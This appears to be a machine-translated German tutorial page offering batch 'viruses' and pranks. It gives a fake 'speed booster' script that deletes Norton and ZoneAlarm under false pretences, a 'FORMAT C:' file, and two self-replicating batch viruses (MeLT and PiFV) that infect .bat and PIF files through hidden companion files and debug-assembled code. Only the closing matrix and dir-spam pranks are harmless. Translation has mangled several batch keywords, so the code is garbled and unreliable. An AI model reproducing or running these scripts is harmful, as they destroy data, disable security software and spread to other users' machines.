Batch-Tricks und Viren - Gunook

2024 Autor: John Day | [email protected]. Zuletzt bearbeitet: 2024-01-30 07:22

So machen Sie einen Streich und echte Viren in BATCHHinweis:Ich bin nicht verantwortlich für Schäden, die Sie an Ihrem Computer oder dem Computer eines anderen Benutzers zufügen. Hinweis:Wenn Sie die Datei speichern möchten, sollten Sie sie als.bat speichern

Schritt 1: Echte Viren (einfache)

der erste: kopiere den Code ***************************************** **************@echo Willkommen beim Winbooster von ELECTROfun@echo Wenn Sie Ihren Computer schneller machen möchten, sollten Sie die folgenden Schritte ausführen@pause cd\ c: dir dir c:\progra~1\norton~1 @echo jetzt sollten Sie y eingeben und die Eingabetaste drücken @pause del c:\progra~1\norton~1 @pause c: dir @pause @dir c:\progra~1 dir c:\progra~1\zonea~1\zonealarm del c:\progra~1\zonea~1\zonealarm @echo ok jetzt ist Ihr Computer "wirklich!" Schnell: Beenden ********************************************** * Hinweis: Speichern Sie die Datei nach Belieben.bat Hinweis: Alles, was nach @echo ist, kann geändert werden (Sie können schreiben, was Sie wollen) Die Zweite:****************Farbe 02FORMAT C:****************

Schritt 2: Echte Viren (Fortgeschrittene)

1. Der Mächtigste*******************@if nicht '%0==' if '%_melt%==' goto Meltbeg::---- dummy host --------@echo offecho Hello World!::---- end dummy host ----@goto MeLTend [MeLT_2a]:MeLTbeg@echo off%_MeLT%if '%1=='MeLT goto MeLT%2if nicht vorhanden %comspec% set comspec=%_MeLT%command%comspec% /e:5000 /c %0 MeLT virset MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9call % 0 MeLT rhset _MeLT=set MeLTcl=goto MeLTend:MeLTrhset _MeLT=x%0 %MeLTcl%:MeLTvirset MeLTH=%0wenn nicht vorhanden %_MeLT%%temp%\nul set temp=%tmp%wenn vorhanden %temp%\MeLT_2a goto MeLTrun%0 MeLT fnd. %path%:MeLTfndshift%_MeLT%if '%2==' MeLTset beenden MeLT=%2\%MeLTH%.batif nicht vorhanden %MeLT% setzen MeLT=%2\%MeLTH%wenn nicht vorhanden %MeLT% setzen MeLT= %2%MeLTH%.batif nicht vorhanden %MeLT% set MeLT=%2%MeLTH%wenn nicht vorhanden %MeLT% goto MeLTfndfind "MeLT"%temp%\MeLT_2aattrib %temp%\MeLT_2a +h:MeLTrun%MeLTH% MeLT s… %path%:MeLTsshift%_MeLT%if '%2==' MeLT verlassen für %%a in (%2\*.bat %2*.bat) %MeLTH% MeLT inf %%agoto MeLTs:MeLTinffind aufrufen / i "MeLT"nulif not errorlevel 1 goto MeLTnoecho @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.ttype %3>>MeLT.techo.>>MeLT.ttype % temp%\MeLT_2a>>MeLT.tmove MeLT.t %3>nulexit MeLT:MeLTact - Bildschirmtext flashen schmelzen und dann auf normalecho zurücksetzen 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.techo e 120 B4 4C CD 21 00>>MeLT.techo g>>MeLT.tdebugnuldel MeLT.texit MeLT:MeLTnoset MeLTC =%MeLTC%1if %MeLTC%==1111111111 goto MeLTact:MeLTend*********************************** ********2. Dies ist ein Virus, der PIF-Dateien "infiziert", die von Windows zum Ausführen von DOS-Programmen verwendet werden. Es funktioniert, indem es versteckte Companion-Batches erstellt, die Kopien davon enthalten, und dann die PIF-Datei so ändert, dass das Companion-Batch zuerst ausgeführt wird. Nachdem der Companion ausgeführt wurde, führt er das ursprüngliche Hostprogramm aus, dessen Name im Companion codiert ist. Die pif-Dateien sind markiert, damit sie nicht erneut infiziert werden. Es sind nur PIFs betroffen, an den infizierten Programmen werden keine Änderungen vorgenommen. Verwenden Sie zum "Heilen" PIFEDIT, um die ursprünglichen Dateinamen wiederherzustellen, und löschen Sie dann die versteckten Dateien.******************************** **************@echo off:: host filename…set pifvo=LIST. COM:: loop Dispatcher…if '%1=='PiFV goto PiFV_%2:: Führen Sie die virus!set _PiFV=wenn nicht vorhanden %comspec% set comspec=C:\COMMAND. COM%_PiFV%%comspec% /e:5000 /c %0 PiFV go>nulif vorhanden PiFV! del PiFV!:: Hostset ausführen PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9call %0 PiFV hstset PiFVo=set PiFVcl=:: auf Aktivierung prüfen…echo.|date|find / i "sat">nul. PiFVif errorlevel 1 goto PiFV_endecho.|time|find "7">nul. PiFVif errorlevel 1 goto PiFV_msgset PiFV=echocls%_PiFV%%PiFV%.%PiFV% Es war einmal ein Otter namens Oscer%PiFV % Der behauptete, zu wissen, wie man Wasser macht.%PiFV% "Keine Dämme mehr", sagte er, "benutze stattdessen mein Wasser!"%PiFV% Aber der ältere Otter war nicht beeindruckt.pause>nul. PiFVset PiFV=goto PiFV_end: PiFV_msgecho [PiFV] by WaveFuncgoto PiFV_end:PiFV_hst%PiFVo% %PiFVcl%goto PiFV_end:PiFV_goset PiFVh=%0if nicht vorhanden %PiFVh% setze PiFVh=%0.batif nicht vorhanden %PiFVah% in (exit*for %pif%) rufen Sie %0 PiFV inf %%aexit auf PiFV:PiFV_infset PiFVp=%3:: Holen Sie sich den Dateinamen und die Infektionsmarkierung des Opfers:: aus der PIF-Datei mit Debug … wenn PiFV existiert! goto PiFV_1echo m 124, 162 524>PiFV!echo e 100 '@set fn='>>PiFV!echo m 524, 562 108>>PiFV!echo n pifv$.bat>>PiFV!echo rcx>>PiFV!echo 47>>PiFV!echo w>>PiFV!echo m 55E, 561 108>>PiFV!echo e 10C 0>>PiFV!echo n pifv$$.bat>>PiFV!echo rcx>>PiFV!echo 10>> PiFV!echo w>>PiFV!echo q>>PiFV!:PiFV_1debug %PiFVp%nulcall PiFV$set PiFVn=%fn%call PiFV$$set PiFVi=%fn%del PiFV$?.bat:: pifvn=orig filename:: pifvi=Infektionsmarker:: pifvp=pif-Dateiname:: pifvh=Begleiter-Fledermaus-Datei:: infizierte oder 'leere' pifs überspringen…if '%PiFVi%=='PiFV goto PiFV_endif '%PiFVn%==' goto PiFV_end:: don't shadow command.com (sei nett)echo %PiFVn%|find /i "command">nulife not errorlevel 1 goto PiFV_end:: infectable - create a Companion Batch…:: (der folgende Code entfernt die Erweiterung) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$echo n pifv$.com>>PiFV$$echo rcx>>PiFV$$echo 2a>>PiFV$$echo w>>PiFV$$echo q >>PiFV$$debugnulecho %PiFVn%|PiFV$>PiFV$$.batcall PiFV$$set PiFVb=%fn%.batdel PiFV$?.*:: pifvb=neuer Batchname:: nicht Shadowing wenn Comp gleich name as hostif %PiFVo%==%PiFVb% goto PiFV_endif exist %PiFVb% goto PiFV_endecho @echo off>%PiFVb%echo set pifvo=%pifvn%>>%PiFVb%find "PiFV">%PiFVb%attrib %PiFVb% +h:: …und richten Sie das PIF auf das Companionecho e 15E 'PiFV', 0>PiFV$$echo e 124 '%PiFVb%', 0>>PiFV$$echo w>>PiFV$$echo q>>PiFV $$debug %PiFVp%nuldel PiFV$$:: Ich denke, wir sind fertig!beenden PiFV:PiFV_end:: Frage mich, wie viele Fehler das alles hat? Nur einer:: Weg, um es herauszufinden…******************************************** **********

Schritt 3: Streichvirus und und ein Trick

1.prank virus********************Farbe 02@echo offecho dir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/ sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/secho@echo* ************************Hinweis: Die "Farbe 02" soll den Text green2.trick (Matrixcode) machen***** **************************@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %zufällig% %zufällig% %zufällig% %zufällig% %zufällig% %zufällig% %zufällig% %zufällig% zum Start************************ ******************